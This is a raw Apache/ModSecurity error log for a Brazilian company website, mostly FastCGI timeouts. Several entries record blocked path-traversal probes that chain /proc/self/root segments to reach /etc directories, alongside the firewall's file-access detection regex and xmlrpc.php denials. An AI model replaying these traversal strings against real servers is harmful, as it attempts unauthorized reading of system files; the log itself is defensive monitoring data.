[Tue Mar 17 23:44:59.766945 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.228.61:35498] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboRqwkwaGbbGflqUZC7LgAAAMM"]
[Tue Mar 17 23:45:07.125823 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57112] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:45:10.905832 2026] [core:alert] [pid 31803:tid 140411548894976] [client 74.7.243.128:41228] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/lib/yum/yumdb
[Tue Mar 17 23:45:29.122075 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57446] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:45:32.579336 2026] [access_compat:error] [pid 31803:tid 140411691570944] [client 51.210.111.125:55743] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:45:51.138286 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57866] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:46:13.128320 2026] [proxy_fcgi:error] [pid 16560:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:46:20.744628 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.243.128:54152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboR_Bj0p0SRWAqcjGGyEwAAAxg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:46:35.128800 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58720] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:46:44.022930 2026] [:error] [pid 16560:tid 140411582465792] [client 74.7.243.128:59328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboSFK6gUSg3B_dEMdIdcAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:46:58.126046 2026] [proxy_fcgi:error] [pid 11816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59306] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:47:20.045949 2026] [proxy_fcgi:error] [pid 16560:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59768] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:47:42.137898 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:48:04.137795 2026] [proxy_fcgi:error] [pid 16560:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60572] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:48:26.144501 2026] [proxy_fcgi:error] [pid 16560:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60968] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:48:48.129961 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:48:53.892125 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:57808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboSlSmAPhZkrhU8w4kYhgAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:49:10.129920 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33564] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:49:32.117819 2026] [proxy_fcgi:error] [pid 11816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:49:54.153811 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34288] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:49:54.909790 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] [client 195.123.216.134:54412] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 23:50:04.401996 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:54822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboS3AkwaGbbGflqUZC7xAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:50:13.143140 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:46664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboS5cdf6f5d65gmYZR3tAAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:50:16.125828 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34756] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:50:38.133891 2026] [proxy_fcgi:error] [pid 15051:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35182] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:51:00.137838 2026] [proxy_fcgi:error] [pid 16560:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:51:22.121195 2026] [proxy_fcgi:error] [pid 11816:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:51:41.065003 2026] [access_compat:error] [pid 16560:tid 140411716749056] [client 109.70.100.1:49996] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:51:44.131784 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36332] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:52:02.219111 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:36470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboTUsdf6f5d65gmYZR3_AAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:52:05.129794 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36770] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:52:27.141813 2026] [proxy_fcgi:error] [pid 2598:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37174] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:52:29.651047 2026] [access_compat:error] [pid 19507:tid 140411725141760] [client 149.88.25.202:50948] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:52:34.658498 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:52918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboTcsdf6f5d65gmYZR4FgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:52:49.128610 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37552] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:53:11.065792 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:53:29.008440 2026] [mime_magic:error] [pid 31803:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:57838] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sys/fs/cgroup/systemd/user.slice
[Tue Mar 17 23:53:33.085835 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:53:41.190088 2026] [core:alert] [pid 19507:tid 140411691570944] [client 74.7.241.31:59844] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/systemd/user
[Tue Mar 17 23:53:56.153802 2026] [proxy_fcgi:error] [pid 19507:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:54:18.137820 2026] [proxy_fcgi:error] [pid 16560:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39104] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:54:40.138110 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39534] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:55:02.282068 2026] [proxy_fcgi:error] [pid 16560:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:55:24.133771 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40314] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:55:46.177825 2026] [proxy_fcgi:error] [pid 16560:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40832] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:56:09.123019 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41256] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:56:31.057868 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:41632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:56:53.129389 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:56:55.195448 2026] [core:alert] [pid 16560:tid 140411540502272] [client 74.7.241.31:50792] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sys/fs/cgroup/systemd/system.slice
[Tue Mar 17 23:57:15.053833 2026] [proxy_fcgi:error] [pid 15051:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:57:18.549410 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:43340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboUjta6ubjKNq_cu4Y-ZQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:57:37.126930 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:57:59.129826 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43484] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:58:00.961836 2026] [core:alert] [pid 31803:tid 140411641214720] [client 74.7.241.31:49204] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice
[Tue Mar 17 23:58:21.125941 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:58:43.133806 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44486] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:58:48.772024 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:39676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboU6OoXxyEfFpUF8f8WLgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:58:50.617237 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:39676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboU6uoXxyEfFpUF8f8WMAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:59:05.149229 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44978] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:59:06.415161 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:40638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboU-ta6ubjKNq_cu4Y-kAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:59:27.121865 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45460] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:59:32.915398 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:49072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboVFOyqAr6etmhZHNpe_AAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:59:48.012476 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.244.43:48654] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboVJOyqAr6etmhZHNpfAQAAAEk"]
[Tue Mar 17 23:59:49.125839 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45964] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:00:01.212417 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.228.61:56192] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboVMeoXxyEfFpUF8f8WRQAAAVU"]
[Wed Mar 18 00:00:11.124602 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46338] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:00:33.153829 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46858] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:00:56.385188 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47428] AH01075: Error dispatching request to : (polling)
